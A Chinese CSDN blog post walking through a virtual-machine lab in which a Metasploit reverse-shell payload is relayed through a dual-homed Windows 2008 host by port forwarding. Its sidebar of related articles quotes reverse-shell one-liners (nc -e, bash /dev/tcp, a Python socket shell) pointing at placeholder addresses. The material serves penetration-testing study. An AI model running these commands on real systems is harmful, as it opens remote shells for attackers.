反弹shell和端口 合并使用

最新推荐文章于 2023-07-12 23:09:14 发布
最新推荐文章于 2023-07-12 23:09:14 发布
阅读量403 收藏
点赞数
文章标签: github windows linux 安全 数据挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/broing55/article/details/104933673
版权

实验环境:

win2008r2   双网卡 1是nat   192.168.75.154  2是vmnet1   IP地址10.1.1.1

kali   IP  nat模式   192.168.75.141

win2003   单网卡  vmnet1   IP地址 10.1.1.2

关闭2008防火墙

kali打开msf,查看kali的ip地址

show payloads

选用这个

然后查看需要配置什么

配置端口5555(端口也是5555的端口)  IP地址是10.1.1.1(win2008r2虚拟机的IP地址)

把kali生成的yc.exe文件放在win2003服务器上

开启kali的msf监听配置

开始监听

在win8上开启转发端口

然后点击yc.exe文件运行

在kali上可以看到返回的shell,可以执行系统命令

 

broing55
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4666
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
反弹shell原理与实现
悦分享
08-02 3336
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
内网转发——反弹端口
cxrpty的博客
03-17 3863
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
[陇剑杯 2021]简单日志分析
J_linnb的博客
04-30 331
将最后一串base64编码解码发现ip和端口,由于最后一串中含有url编码,可以先进行url解码再进行base64解码。黑客查看的秘密文件的绝对路径是(/Th4s_IS_VERY_Import_Fi1e)。黑客反弹shell的ip和端口是(192.168.2.197:8888)将user后面base64编码解码后发现黑客查看的文件路径。黑客攻击的参数是(user)。(如有字母请全部使用小写)分析日志,可以发现黑客使用user传参所有参数为user。
Windows 反弹shell方法
weixin_53747497的博客
07-12 2774
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
内网转发之反弹端口
broing55的博客
03-17 918
反弹端口实验 实验环境:windows 2008r2服务器 和 本机 实验步骤 win2008服务器开启防火墙,开启3389端口并不对外开放,利用reduh工具使其服务器将其他端口公用。 本地计算机关闭防火墙和杀毒软件,安装java环境和jdk服务 实验流程: 配置虚拟机环境,将远程控制打开 然后将reduh中的aspx文件上传到wwwroot下面 然后本机计算机访问一下...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1187
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
shell批量检测端口脚本
02-08
批量检测端口并导出记录 附件中的telnet.sh为执行脚本 ip.txt为IP地址,端口在脚本中自定 实现多IP多端口 默认路径/root 上传到服务器默认路径下直接可以使用 运行完成后: log.txt为记录清单
php反弹shell实现代码
10-30
通过设置反弹IP(`$yourip`)和端口(`$yourport`),构造一个base64编码后的shell脚本,保存到`/tmp/.bc`文件中。这个脚本会尝试在本地打开一个监听端口,并通过Socket连接到远程服务器,从而实现反弹Shell。 整个...
使用php shell命令合并图片的代码
10-28
8. 图片转换和尺寸调整:脚本中使用了命令来将图片转换至特定尺寸,如 `$aa="转换-质量90-尺寸320x480+";`,这里可能是一个假定的命令,因为标准的PHP GD库中并没有直接对应这样的命名,可能是对 `...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
反弹shell的几种获取方式.docx
最新发布
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
web渗透常见shell反弹姿势
RuoLi_s的博客
11-28 811
常见反弹shell总结: 一、bash反弹 通用 ① 在kali机里面开启端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 ③ 解释 bash -i: 打开一个交互的bash .>&: 标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port : 意为调
反弹Shell原理与实现
m0_62451321的博客
11-14 3198
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
反弹shell的N种姿势
热门推荐
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
渗透测试-window反弹shell
lza20001103的博客
05-11 4480
window反弹shell
渗透中反弹shell端口
千寻的博客
01-03 1827
渗透中反弹shell端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
Web渗透中的反弹Shell端口转发的奇淫技巧
大方子
10-02 9624
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i >& /dev/tcp/x.x.x.x/2333 0&g...
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
正向shell反弹shell
07-27
正向shell反弹shell都是与远程服务器建立连接的方式,但它们的工作原理和使用场景有所不同。 正向shell是指通过在目标服务器上运行一个监听程序,等待来自客户端的连接。客户端主动连接到目标服务器上的监听端口,建立起双向通信,然后可以执行命令、传输文件等操作。正向shell通常用于在目标服务器上部署一个后门,以便随时可以通过客户端连接进行管理和控制。 反弹shell则是指在目标服务器上运行一个监听程序,等待来自攻击者的连接。攻击者通过在自己的机器上运行一个客户端程序,主动连接到目标服务器上的监听端口,建立起双向通信。一旦连接建立成功,攻击者就可以执行命令、操控目标服务器等。反弹shell通常用于在目标服务器上执行远程攻击或渗透测试。 需要注意的是,正向shell反弹shell都属于潜在的安全威胁,只能在合法和授权的情况下使用。任何未经授权的使用都是非法的,并可能涉及违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值